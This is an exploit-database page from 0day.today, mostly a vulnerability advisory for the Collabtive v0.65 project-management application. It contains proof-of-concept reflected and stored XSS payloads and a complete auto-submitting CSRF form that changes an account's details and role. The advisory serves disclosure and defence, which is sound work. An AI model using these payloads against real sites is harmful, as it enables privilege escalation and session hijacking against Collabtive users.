0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Collabtive v0.65 Multiple Vulnerabilities
========================================= Collabtive v0.65 Multiple Vulnerabilities ========================================= ### VULNERABLE PRODUCT ### + Description: "Collabtive provides a web based platform to bring the project management process and documentation online. Collabtive is an open source solution with features and functionality similar to proprietary software such as BaseCamp." + Homepage: http://www.collabtive.com ### VULNERABILITY DETAILS ### I. Non-persistent Cross-site Scripting -------------------------------------- + Description: Application insert HTTP "y" parameter in "manageajax.php" and HTTP "pic" parameter in "thumb.php" into html output and fails while sanitize user supplied these inputs. Attackers can execute malicious javascript codes or hijacking PHPSESSID for privilege escalation. + Exploit/POC: http://target/manageajax.php?action=newcal&y=<script>alert(/XSS/)</script> http://target/thumb.php?pic=<script>alert(/XSS/)</script> II. Cross-site Request Forgery ------------------------------ + Description: Collabtive affects from Cross-site Request Forgery. Technically, attacker can create a specially crafted page and force collabtive administrators to visit it and can gain administrative privilege. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha and asking old password for critical actions. --> <html> <head> <title>Collabtive CSRF P0C</title> </head> <body> <form method="post" action="http://collabtive/admin.php?action=edituser&id=2" enctype="multipart/form-data" name="csrfXploit"> <input type="hidden" value="hacker" name="name" /> <input type="hidden" value="hacker@hacker" name="email" /> <input type="hidden" value="m" name="gender" /> <input type="hidden" value="en" name="locale" /> <input type="hidden" value="" name="admin" /> <input type="hidden" value="1" name="role"> </form> <script type="text/javascript"> document.csrfXploit.submit(); </script> </body> </html> III. Stored Cross-site Scripting -------------------------------- + Description: Collabtive has Stored Cross-site Scripting vulnerability. Every user can change their usernames and application allows HTML codes and stores in database. + Exploit/POC: Change username to "user<script>alert(/AS/)</script>". # 0day.today [2024-12-25] #